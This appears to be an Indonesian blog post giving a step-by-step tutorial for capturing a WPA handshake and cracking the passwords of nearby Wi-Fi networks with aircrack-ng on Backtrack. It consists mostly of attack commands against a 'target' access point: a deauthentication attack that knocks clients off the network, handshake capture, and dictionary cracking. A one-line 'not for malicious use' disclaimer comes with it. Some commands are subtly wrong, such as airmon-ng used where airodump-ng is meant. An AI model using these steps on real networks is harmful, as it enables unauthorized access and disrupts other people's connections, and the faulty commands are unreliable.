Cara hack dan mendapatkan pasword wifi menggunakan BACKTRACK

Pada kesempatan pagi hari ini saya akan membagi teriturial cara mendapatkan pasword wifi di backtrack linux dan saya menggunakan Backtrack5r3 dan teritual ini juga berguna di Kali Linux Gnome
sebelum itu saya sudah mencoba ternyata bisa karna backtrack memiliki 300tools Hacking lumayan cukup banyak satu hal lagi teriturial ini tidak untuk kegiatan jahat cyber teriturial ini untuk menambah wawasan kita tentang linux backtrack
Hasil gambar untuk backtrack 5 r3


Persiapan :
1. Aircrack
2. Dictionary attack


Langkah - Langkah :
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover


1. Hentikan semua proses yang menghambat jalannya aireplay
#airmon-ng check kill

2. Buat interface baru dengan mode monitor menggunakan airmon-ng
#airmon-ng start wlan0

3. Monitoring setiap akses poin yang ada di sekitar attacker
#airodump-ng mon0


4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump
#airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0


Keterangan :
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin



5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0

Keterangan :
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien

Note :
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
#aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0



6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng
#aircrack-ng output-01.cap -w /root/crack wpa.txt

Keterangan :
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.


7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini

saya telah mengetes nya hasilnya lumayan walupun tidak cepat
dah hanya ini saya sampaikan kalo terial ini sudah saya coba berkali kali jika ada yang kurang tahu untuk memutuskan jaringan dengan backtack atau binggung silahkan tinggalkan komentar sampai jumpa 

Next PostPosting Lebih Baru Previous PostPosting Lama Beranda

0 komentar:

Posting Komentar